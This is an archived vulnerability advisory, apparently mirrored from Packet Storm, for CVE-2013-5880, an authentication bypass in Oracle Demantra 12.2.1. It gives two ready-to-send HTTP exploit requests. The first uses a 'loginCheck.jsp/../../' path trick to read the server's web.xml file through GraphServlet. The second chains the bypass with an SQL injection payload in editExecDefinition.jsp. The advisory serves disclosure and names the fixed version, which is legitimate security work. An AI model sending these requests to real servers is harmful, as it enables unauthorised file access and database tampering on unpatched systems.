Lucene search

K
packetstormOliver GruskovnjakPACKETSTORM:125483
HistoryMar 02, 2014 - 12:00 a.m.

Oracle Demantra 12.2.1 Authentication Bypass

2014-03-0200:00:00
Oliver Gruskovnjak
packetstormsecurity.com
34

0.884 High

EPSS

Percentile

98.7%

`Vulnerability title: Authentication Bypass in Oracle Demantra  
CVE: CVE-2013-5880  
Vendor: Oracle  
Product: Demantra  
Affected version: 12.2.1  
Fixed version: 12.2.3  
Reported by: Oliver Gruskovnjak  
  
Details:  
  
The authentication filter in Oracle Demantra is broken by design.  
  
For example the page:  
  
/demantra/common/loginCheck.jsp  
  
Is accessible by an unauthenticated user and is therefore listed in the  
whitelisted URLs list. It is now possible to use this whitelisted URL to  
access restricted URLs.  
  
Exploit:  
  
Sample Request:  
  
POST /demantra/common/loginCheck.jsp/../../GraphServlet HTTP/1.1  
Host: target.com:8080  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:22.0) Gecko/20100101 Firefox/22.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
DNT: 1  
Connection: keep-alive  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 46  
  
filename=C:/Program Files (x86)/Oracle Demantra Spectrum/Collaborator/demantra/WEB-INF/web.xml  
  
This attack works with other vulnerabilities reported like the SQL injection for example by using the following request:  
  
POST /demantra/common/loginCheck.jsp/../../portal/editExecDefinition.jsp HTTP/1.1  
Host: target.com:8080  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:22.0) Gecko/20100101 Firefox/22.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
DNT: 1  
Referer: http://192.168.14.171:8080/demantra/portal/editExecDefinition.jsp?menuBarId=2&menuGroupId=4&menuItemId=10&tkn=919872817530076  
Cookie: ORA_EBS_DEMANTRA_LOGIN_LANGUAGE=US; JSESSIONID=6741133838FDEC5D65258F72A4E4EB87  
Connection: keep-alive  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 388  
  
done=done&menuBarId=2&menuGroupId=4&tkn=919872817530076&menuItemId=10&menuAction=edit&order=0&command=http%3A%2F%2Fwww.oracle.com%2Fdemantra%2Findex.htm'&title=Demantra+Web+Site&description=Demantra+Web+Site&type=3&fileInput=&linkInput=http%3A%2F%2Fwww.oracle.com%2Fdemantra%2Findex.htm%27&desktopCommand=%23DEMANTRA.MODELER%23&param=  
  
  
  
Further details at:  
https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2013-5880/  
  
  
Copyright:  
Copyright (c) Portcullis Computer Security Limited 2014, All rights  
reserved worldwide. Permission is hereby granted for the electronic  
redistribution of this information. It is not to be edited or altered in  
any way without the express written consent of Portcullis Computer  
Security Limited.  
  
Disclaimer:  
The information herein contained may change without notice. Use of this  
information constitutes acceptance for use in an AS IS condition. There  
are NO warranties, implied or otherwise, with regard to this information  
or its use. Any use of this information is at the user's risk. In no  
event shall the author/distributor (Portcullis Computer Security  
Limited) be held liable for any damages whatsoever arising out of or in  
connection with the use or spread of this information.  
  
  
`

0.884 High

EPSS

Percentile

98.7%